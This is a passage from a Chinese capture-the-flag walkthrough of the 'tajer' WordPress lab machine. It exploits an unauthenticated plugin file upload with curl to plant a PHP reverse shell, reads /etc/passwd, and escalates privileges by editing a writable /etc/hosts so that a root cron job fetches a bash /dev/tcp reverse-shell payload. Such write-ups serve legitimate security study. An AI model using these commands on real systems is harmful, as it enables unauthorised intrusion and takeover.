src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160454569\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>\u5c1d\u8bd5sql\u6ce8\u5165<\/h4>\n<p>\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840106.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840106.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160659224\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840107.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840107.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160738135\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5565\u5f31\u5bc6\u7801\u7684\u90fd\u4e0d\u7528\u8bd5\u4e86\uff0c\u5c1d\u8bd5sql\u6ce8\u5165\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-text\">POST \/wp-login.php HTTP\/1.1\nHost: tajer.wordpress.hmv\nContent-Length: 111\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/tajer.wordpress.hmv\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.6167.85 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/tajer.wordpress.hmv\/wp-login.php?redirect_to=http%3A%2F%2Ftajer.wordpress.hmv%2Fwp-admin%2F&amp;reauth=1\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\nCookie: wordpress_test_cookie=WP%20Cookie%20check\nConnection: close\n\nlog=admin&amp;pwd=password&amp;wp-submit=Log+In&amp;redirect_to=http%3A%2F%2Ftajer.wordpress.hmv%2Fwp-admin%2F&amp;testcookie=1<\/code><\/pre>\n<p>\u6ca1\u6709\u626b\u51fa\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840108.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840108.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406161731281\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840109.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840109.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406161844292\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u90a3\u4f30\u8ba1\u5c31\u4e0d\u662f\u8ba9\u4eba\u4ece\u8fd9\u5165\u624b\u7684\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840110.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840110.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406162004280\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u9ebb\u70e6\u5927\u4e86\u3002\u3002\u3002\u5c1d\u8bd5\u5bfc\u5165token\u770b\u770b\u80fd\u4e0d\u80fdwpscan\u626b\u51fa\u6f0f\u6d1e\uff1a<\/p>\n<h4>wpscan with token<\/h4>\n<pre><code class=\"language-bash\">sudo wpscan --url http:\/\/tajer.wordpress.hmv\/ --api-token=xxxxx<\/code><\/pre>\n<p>token\u53bb\u7f51\u4e0a\u6ce8\u518c\u4e00\u4e2a\u8d26\u53f7\u53ef\u4ee5\u62ff\u5230\uff0c\u4e00\u592925\u6b21\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840111.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840111.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406162806670\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u672a\u8ba4\u8bc1\u63d2\u4ef6\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/h3>\n<p>\u5b58\u5728<code>tajer<\/code>\u63d2\u4ef6\uff0c\u4e14\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840112.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840112.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406162908614\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u6b63\u5e38\u8bbf\u95ee\u5230\uff0c\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840113.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840113.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406163128920\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">curl   -F &quot;files=@revershell.php&quot; http:\/\/tajer.wordpress.hmv\/wp-content\/plugins\/tajer\/lib\/jQuery-File-Upload-master\/server\/php\/index.php\ncurl http:\/\/tajer.wordpress.hmv\/wp-content\/plugins\/tajer\/lib\/jQuery-File-Upload-master\/server\/php\/files\/revershell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840114.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840114.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406163646305\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840115.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840115.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406163633291\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@tajer:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@tajer:\/$ pwd\n\/\n(remote) www-data@tajer:\/$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:107:114:MySQL Server,,,:\/nonexistent:\/bin\/false\nkevin:x:1001:1001::\/home\/kevin:\/bin\/bash\n(remote) www-data@tajer:\/$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@tajer:\/$ crontab -l\nno crontab for www-data\n(remote) www-data@tajer:\/$ cd \/homt\nbash: cd: \/homt: No such file or directory\n(remote) www-data@tajer:\/$ cd \/home\n(remote) www-data@tajer:\/home$ ls\nkevin\n(remote) www-data@tajer:\/home$ cd kevin\/\nbash: cd: kevin\/: Permission denied\n(remote) www-data@tajer:\/home$ cd \/tmp;ls -la\ntotal 36\ndrwxrwxrwt  9 root root 4096 Apr  6 04:35 .\ndrwxr-xr-x 18 root root 4096 Mar 31  2022 ..\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .ICE-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .Test-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .X11-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .XIM-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .font-unix\ndrwx------  3 root root 4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-logind.service-GjHWlh\ndrwx------  3 root root 4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-timesyncd.service-c42Ysf\n(remote) www-data@tajer:\/tmp$ cd \/usr\/local\/bin\n(remote) www-data@tajer:\/usr\/local\/bin$ ls -la\ntotal 80\ndrwxr-xr-x  3 root root 4096 Apr  1  2022 .\ndrwxr-xr-x 10 root root 4096 Jan 12  2022 ..\ndrwxr-xr-x  2 root root 4096 Mar 31  2022 __pycache__\n-rwxr-xr-x  1 root root  215 Mar 31  2022 cmark\n-rwxr-xr-x  1 root root  214 Mar 31  2022 deep\n-rwxr-xr-x  1 root root  207 Mar 31  2022 dotenv\n-rwxr-xr-x  1 root root 1651 Mar 31  2022 get_objgraph\n-rwxr-xr-x  1 root root 1695 Mar 31  2022 jp.py\n-rwxr-xr-x  1 root root  211 Mar 31  2022 pbr\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3.9\n-rwxr-xr-x  1 root root  216 Apr  1  2022 pydisasm\n-rwxr-xr-x  1 root root  215 Mar 31  2022 pygmentize\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pysemver\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pytail\n-rwxr-xr-x  1 root root 2078 Apr  1  2022 spark-parser-coverage\n-rwxr-xr-x  1 root root  209 Mar 31  2022 tabulate\n-rwxr-xr-x  1 root root  587 Mar 31  2022 undill\n-rwxr-xr-x  1 root root  208 Mar 31  2022 wheel<\/code><\/pre>\n<h3>\u4e0a\u4f20linpeas.sh\u4ee5\u53capspy64<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840116.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840116.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165222654\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840117.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840117.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165356674\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u51fa\u73b0\u4e86\u62a5\u9519\uff0c\u6211\u8bd5\u4e86\u597d\u51e0\u56de\u90fd\u4e0d\u884c\uff0c\u5c1d\u8bd5\u8001\u529e\u6cd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840118.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840118.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165551195\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5148\u4f7f\u7528\u4e00\u4e0b<code>linpeas.sh<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840119.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840119.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165955000\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-apl\">kevin\nk3v!n7#3c0d3r<\/code><\/pre>\n<pre><code class=\"language-text\">su: Authentication failure<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b<code>pspy64<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840120.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840120.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406170737252\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u68c0\u6d4b\u5230\u4e86\u5f88\u660e\u663e\u7684\u5b9a\u65f6\u4efb\u52a1\uff0c\u5b83\u8bf7\u6c42\u4e86\u4e00\u4e2a\u540d\u4e3a<code>k3vin<\/code>\u7684\u6587\u4ef6\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728dns\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@tajer:\/$ cat \/etc\/hosts\n127.0.0.1       localhost\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n(remote) www-data@tajer:\/$ ls -l \/etc\/hosts\n-rw-rw-rw- 1 root root 169 Apr  1  2022 \/etc\/hosts<\/code><\/pre>\n<p>\u6ca1\u6709\uff0c\u4e14<code>hosts<\/code>\u6587\u4ef6\u53ef\u7f16\u8f91\uff0c\u5c1d\u8bd5\u7f16\u8f91\u4e00\u4e2a\u8fdb\u53bb\uff0c\u6307\u5411\u6211\u4eec\u672c\u5730\u7684IP\u5730\u5740\uff0c\u7136\u540e\u5728\u672c\u5730\u8bbe\u7f6e\u4e00\u4e2a\u53cd\u5f39shell\u7ed9\u4ed6\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">vim k3vin\n# bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/2345 &lt;&amp;1&#039;\npython3 -m http.server 80<\/code><\/pre>\n<pre><code class=\"language-bash\">echo &#039;172.20.10.8  password.wordpress.hmv&#039; &gt;&gt; \/etc\/hosts<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840121.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 